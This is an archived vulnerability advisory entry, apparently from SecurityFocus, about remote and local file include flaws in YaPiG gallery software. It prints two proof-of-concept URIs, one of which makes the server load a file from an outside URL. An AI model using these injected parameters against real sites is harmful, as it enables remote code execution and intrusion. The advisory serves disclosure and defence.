YaPiG Remote and Local File Include Vulnerabilities

No exploit is required.

The following proof of concept URI are available:
Version 0.92b: http://www.example.com/global.php?BASE_DIR=/local/path/to/global-gen.php
Version 0.93u/ 0.94u: http://www.example.com/last_gallery.php?YAPIG_PATH=http://www.example.com/


 

Privacy Statement
Copyright 2010, SecurityFocus